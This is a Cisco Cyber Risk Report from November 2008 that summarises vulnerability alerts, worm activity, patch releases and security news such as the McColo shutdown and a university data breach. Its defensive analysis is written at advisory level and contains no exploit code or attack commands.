The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.

Vulnerability

Much of the vulnerability and threat activity levels from the previous week centered on security releases by both Apple and Mozilla. Each vendor released updated versions of its web browsers to address multiple vulnerabilities. Many of these vulnerabilities had not been previously disclosed. The browser is often the most exposed application on a user's system. Whether at home or at work, users are advised to keep the patch levels current on their browsers.

Microsoft released its monthly security updates, which addressed four vulnerabilities. Two of these vulnerabilities had been disclosed previously. Of particular interest was the SMB protocol NTLM credential handling arbitrary code execution vulnerability in Microsoft Windows, as described in IntelliShield Alert 16986. This vulnerability was initially reported to Microsoft in 2001 and demonstrated by the SMB Relay attack tool. The Microsoft Security Response Center explained the delay in a blog post. At the time of disclosure, Microsoft considered any potential fix infeasible because it would severely impact many network-based applications, such as Outlook or Exchange. Changes made to the current versions of Windows allowed Microsoft to create a fix that would not prevent network applications from functioning. Also of interest was the memory corruption vulnerability in Microsoft XML Core Services, as described in IntelliShield Alert 12620. This vulnerability was originally disclosed publicly by independent security researchers in February of 2007. When it was originally reported, the vulnerability was thought to be native to the Internet Explorer web browser, but the vulnerability actually affects any application that uses the XML Core Services. The bulletins released by Microsoft address both these vulnerabilities.

In malicious code activity this week, W32.Kernelbot.A has received some additional updates to evade detection. Cisco IntelliShield has observed additional filenames and malicious websites being used by the worm. With these updates, the worm will likely evade detections for a short period of time and compromise further machines. The worm continues to exploit the Microsoft Windows Server Service remote procedure call request handling code execution vulnerability, as described in IntelliShield Alert 16941, to propagate to other systems on the same network segment. To ensure that environments are protected, IntelliShield strongly encourages administrators to apply the appropriate Microsoft and Adobe updates and ensure that virus definitions are updated appropriately. The worm is described in IntelliShield Alert 16994.

IntelliShield published 112 events last week: 51 new events and 61 updated events. Of the 112 events, 90 were Vulnerability Alerts, eight were Security Activity Bulletins, five were Security Issue Alerts, five were Malicious Code Alerts, two were Applied Mitigation Bulletins, and two were Cyber Risk Reports. The alert publication totals are as follows:

Weekly Alert Totals

Previous Alerts That Still Represent Significant Risk

Adobe Acrobat Products util.printf() Function Buffer Overflow Vulnerability
IntelliShield Vulnerability Alert 16999, Version 7, November 12, 2008
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2008-2992

Adobe Acrobat Professional, 3D, and Standard and Adobe Reader contain a buffer overflow vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the user. A variant of the Pidief family of trojans described in IntelliShield Alert 14388 is actively exploiting this vulnerability in the wild. Adobe has confirmed the vulnerability and released updated software. Administrators are advised to apply the appropriate updates and to ensure that current antivirus definitions are installed. Users should also be cautious of unsolicited PDF files that may arrive via e-mail.

Microsoft Windows Server Service Remote Procedure Call Request Handling Code Execution Vulnerability
IntelliShield Vulnerability Alert 16941, Version 3, October 24, 2008
Urgency/Credibility/Severity Rating: 3/5/5
CVE-2008-4250

Microsoft Windows contains a buffer overflow vulnerability that could allow an unauthenticated, remote attacker to create a denial of service condition or execute arbitrary code. Exploit code is publicly available, and the Troj/Gimmiv-A, W32.Kernelbot.A, and W32.Wecorl worms are also actively exploiting this vulnerability to install themselves on target systems. Additional information on these worms is available in IntelliShield Alerts 16947, 16985, and 16994. Microsoft has confirmed the vulnerability and released software updates. Administrators are advised to apply the appropriate updates and to ensure that current antivirus definitions are installed.

Microsoft Windows Internet Printing Protocol Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 16798, Version 4, October 20, 2008
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2008-1446

Microsoft Windows contains a vulnerability in Internet Printing Protocol (IPP) request processing that could allow a remote attacker to execute arbitrary code. Only systems that have IIS installed and support Internet Printing services are vulnerable. Internet Printing is not supported in default installations of Windows Vista systems and Windows Server 2003 and Windows Server 2008 systems. When IIS is installed on Windows 2000 and Windows XP systems, Internet Printing is enabled by default. Functional exploit code is available. This vulnerability is actively being exploited. Microsoft has confirmed this vulnerability in a security bulletin and released software updates.

Multiple Browsers and Adobe Flash Player Mouse Click Hijacking Vulnerability
IntelliShield Security Activity Bulletin 16770, Version 7, November 17, 2008
Urgency/Credibility/Severity Rating: 3/5/3
CVE-2008-4503

Independent security researchers have discovered a critical flaw that affects multiple, commonly used web browsers and the Adobe Flash Player. If an attacker can convince a user to visit a malicious web page, the attacker could take complete control over the user's mouse clicks, possibly fooling the user into thinking he or she is clicking on a legitimate link. An exploit could allow the attacker to control the hidden HTML interaction that is occurring, hiding the invisible hyperlinks that the user is actually following. This type of exploit is being referred to as clickjacking. Adobe has released both a security advisory and a security bulletin as well as releasing updated software to address this vulnerability.

Sockstress Exploit Tool Exposes Vulnerabilities in TCP Stack Implementations of Multiple Vendors
IntelliShield Vulnerability Alert 16773, Version 4, October 17, 2008
Urgency/Credibility/Severity Rating: 2/5/3

Independent security researchers developed the sockstress tool, which exposes vulnerabilities in the TCP stack implementation of multiple vendors. The researchers have not publicly released the sockstress tool yet and few technical details of the associated vulnerabilities are publicly available. The researchers are coordinating the release of details to affected vendors through Funet CERT of Finland. The researchers made their presentation, but released few details, on October 17, 2008 at the T2 2008 security conference in Helsinki, Finland. Cisco has released a Security Response for this activity.

Citect CitectSCADA and CitectFacilities ODBC Service Buffer Overflow Vulnerability
IntelliShield Vulnerability Alert 16071, Version 3, September 9, 2008
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2008-2639

Citect CitectSCADA contains a vulnerability that could allow a remote attacker to cause a DoS condition or execute arbitrary code. Exploit code that could allow the attacker to achieve code execution is available. The vulnerable applications provide remote SQL access to a relational database with the use of the ODBC server component. Such systems should be contained in their own network and never connected to corporate networks or exposed to the Internet. Attackers who can access the network on which these machines reside must still connect to the TCP port that the ODBC service uses.

Physical

Network Administrator Convicted on Numerous Charges

On Friday, November 7, 2008, Andrew Madrid, a former network administrator in San Jose, CA, pleaded guilty to numerous charges for offenses committed from September 2006 through March 2008.  Madrid is convicted of hacking into servers, identity theft, burglary, and drug charges.  The victims' names are currently being withheld.  The Santa Clara District Attorney's deputy district attorney, Ben Field, indicated that this case "was one of the most sophisticated computer crimes" to have been prosecuted by the office.  Madrid was able to pose as a legitimate security guard or IT employee to obtain physical access to companies.  In addition, Madrid found unattended security badges in plain sight in office cubicles.  Other crimes consisted of swapping bar codes on products in stores to pay a lower price and possession of methamphetamine.  He could be sentenced for 6 to 12 years, which will be determined on January 22, 2009. Read More

IntelliShield Analysis: This type of security breach is an example of how important it is to control access and question any person who is unfamiliar in an office building and to maintain physical possession of any passcards.  Physical security is a commonly overlooked practice when it comes to protecting offices, data centers, and buildings, often due to convenience.  Signage, perimeter fencing, and detective controls such as cameras and security guards can help control access to and movement in the office area.  Organizations are advised to require inspectors, work crews, and visitors to be escorted through the premises despite the inconvenience.  Organizations are also advised to authenticate unannounced visitors before allowing access to facilities.  In addition, employees should never leave security badges unattended or in unlocked containers.

Legal

Malicious Internet Service Provider McColo Shut Down

Internet service provider (ISP) McColo was shut down Tuesday, November 11, 2008 by the upstream ISPs Hurricane Electric and Global Crossing after extensive analysis performed by several Internet security researchers.  McColo was based in San Jose, California and was reportedly responsible for hosting botnet command-and-control servers, malware distribution sites, rogue security software, cybercrime affiliate payment systems, and child pornography websites.  The IronPort Threat Operations Center has reported a major decline in spam volume as a result of this shutdown.  Spam activity levels have decreased from approximately 190 billion total messages per day in October to 112 billion on November 11.  Further information is available in IntelliShield Alert 17068.  McColo came back online on November 15 through TeliaSonera, a Swedish ISP.
Read More
Additional Information
Additional Information

IntelliShield Analysis: Security professionals and law enforcement have aided the upstream hosting providers in determining to shut down ISPs that are suspected of harboring illicit activities.  The researchers and law enforcement agencies involved gathered the evidence to make their case and presented it to the network providers of the suspected ISP.  The providers, in this case Hurricane Electric and Global Crossing, leveraged this information to perform their own analysis, which led to the termination of connections provided to the malicious ISP.  The security community relies on the hosting providers' involvement to shut down the infrastructures that are enabling malicious ISPs.  However, the ISPs cannot identify malicious activity on their own because they may have several thousand customers, and monitoring for this activity is often not feasible because of the volume of traffic that the ISPs handle.  Prior to security events that require coordinated responses or law enforcement involvement, customers are encouraged to develop close working relationships with their ISPs and law enforcement and to understand the service-level agreement (SLA) and what steps the ISPs can and will take.

Laid-Off System Administrator Arrested on Charges of Extortion

A system administrator who had been laid off from his job at an unspecified mutual fund company has been arrested on two charges under the federal cyberextortion statute.  He is accused of sending e-mail messages to his former employer threatening to damage their computer systems if they did not improve his severance package and give him excellent references.  After the first e-mail, the company contacted law enforcement.  At the request of the law enforcement investigative team, the employer recorded two phone calls that were also made by the laid-off employee.  He threatened to get some hacker friends to help him break in to the company's computers and to inform the media about any damage he caused.  The police arrested him at his home on November 10.  Read More

IntelliShield Analysis: During this time of financial crisis, there are a growing number of employee layoffs.  This stressful environment could also lead to an increased number of disgruntled employees who attempt to take malicious actions against their current or former employers.  However, the company in question handled the situation well.  The employer locked the former employee out of company computer systems to deny access, forcing him to attempt to illegally access the systems if he wanted to do any damage.  The company also alerted the police as soon as it received the first threatening letter.  By working with the police, the employer was able to have the man arrested within 4 days of the initial threat and avoid any damage to company systems.

Trust

VISA Europe Trials New PIN Cards

First announced in June, new personal identification number (PIN) credit and debit cards are now undergoing trials by VISA Europe in cooperation with MBNA Bank, Corner Bank, Cal, and IW Bank.  The cards integrate a PIN generator on the back of the cards, which allows a one-time PIN to be created for each transaction.  To obtain the one-time PIN, the user enters the user's personal PIN into the PIN generator.  By generating a single-use PIN, the card promises to improve the security of online transactions.  The lifetime of the cards' electronic components is said to be 3 years.  Read More

IntelliShield Analysis: This new technology could help defeat some types of credit card fraud, such as the theft of numbers or cards, by requiring a user not only to hold a credit card number to make purchases, but also to enter the user's personal PIN in order to generate the one-time PINs.  The one-time PIN also improves security by ensuring that a user's personal PIN is never transmitted over the web. If a card is stolen, the new PIN generator may also help safeguard a lost card as long as the PIN-generation scheme is a secure, one-way method and the personal PIN that the user inputs to operate the PIN-generating mechanism cannot be recovered from the mechanism itself and then used to obtain one-time PINs.

Identity

University of Florida Announces Dental Patient Data Breach

The University of Florida recently notified 330,000 current and former patients that their sensitive information has been compromised. This information includes names, addresses, birth dates, Social Security numbers, and possibly dental procedure records.  The compromise was discovered by an IT staff member on October 3, 2008 while upgrading the server.  No evidence of identity theft has been reported, but those at risk were notified and instructed to be vigilant for signs of malicious activity.  Read More

IntelliShield Analysis: The university is working with the United States Federal Bureau of Investigation and the local police to investigate this incident. To help prevent these kinds of incidents, organizations are encouraged to increase monitoring of data flow.  These types of data compromises have continued for quite some time, and universities and large corporate compromises have largely failed to produce any increased security measures or legislative actions to prevent them.  A complex combination of controls could be needed, but the central key is to identify the sensitive information storage and the movement of the information from that point.

Human

Spammers Need Only One in 12,500,000 to Respond

Researchers from the University of California at Berkeley and the University of California at San Diego have released a study based on monitoring spam levels in the Storm botnet.  Initial findings of the study indicate the spammers require only a very small percentage, one in 12,500,000, to respond to the spam messages for the criminals to profit from the activity.  The researchers actually took control of some of the compromised systems in the botnet and used them to send commonly crafted spam messages and monitor the responses.  Read More

IntelliShield Analysis: Some of the initially released data seems questionable in this study, but it still reinforces what previous studies, security professionals, and law enforcement have established: Spammers require a very small response to make their operations highly profitable.  Despite our best technology, user awareness campaigns, and control measures for spam, the success of efforts against spam will be limited as long as the criminals require only a very small percentage of users to respond.  The risk-to-reward ratio for spamming remains well in the spammers' favor.  Law enforcement has focused on this problem and continues to increase investigation and prosecution of these criminal organizations.  This is the weakness in countering the spam activity that can tilt the risk-to-reward ratio against the spammers.  Businesses are encouraged to continue using strong measures to limit spam, but also to cooperate with law enforcement in the identification and prosecution of the criminal organizations that are conducting the spamming and other illegal activities.

Geopolitical

Hackers Outside United States Target Presidential Campaign and White House Systems

Press reports have surfaced recently claiming that United States (U.S.) White House e-mail systems have been compromised repeatedly by hackers whose activity originates from servers in China.  In each case, unclassified e-mail messages between lower-level U.S. government officials appear to have been accessed.  Separately, the two leading U.S. presidential candidates, Senators Obama and McCain, were informed by the Federal Bureau of Investigation and Secret Service officials in August that their websites had been hacked and extensive amounts of sensitive information related to policy planning had been downloaded to foreign servers, according to a Newsweek report.  Although the nationality of the hackers was not disclosed, security firms hired by the campaigns speculated that the intrusions originated in either Russia or China.
Read More
Additional Information
Additional Information

IntelliShield Analysis: Given the targeted nature of the intrusions and their level of sophistication, it appears that the White House e-mail access may have been for intelligence-gathering purposes.  Although information is sketchier about the nature of the hacks on the McCain and Obama websites, it is possible that state-sponsored hackers may have been looking for confidential policy notes that could provide foreign governments with an early advantage in negotiating with the incoming presidential administration.  Looking specifically at the nature of the incidents, some press reports recalled the "grains of sand" approach sometimes used in intelligence collection.  This strategy involves employing many people to review large quantities of low-sensitivity information, looking for valuable material.  Information security specialists may wish to use these incidents as a reminder that low-sensitivity information may be targeted if protection mechanisms are less robust than those used to protect genuinely classified information.

Upcoming Security Activity

Computer Security Institute 2008: November 15–21, 2008
Government Information Group Security IT Conference & Exhibition: November 20–21, 2008
RUXCON 2008: November 29–30, 2008
25th Chaos Communication Congress: December 27–30, 2008

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:

Thanksgiving (United States): November 27, 2008
Hanukkah: December 21–28, 2008
Eid al-Adha: December 8–11, 2008
Christmas: December 25, 2008
Boxing Day/Day of Goodwill: December 26, 2008
New Year's Eve: December 31, 2008
New Year's Day: January 1, 2009

Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit
Cisco Security IntelliShield Alert Manager Service

For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit
Trial Registration

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.

Back to Top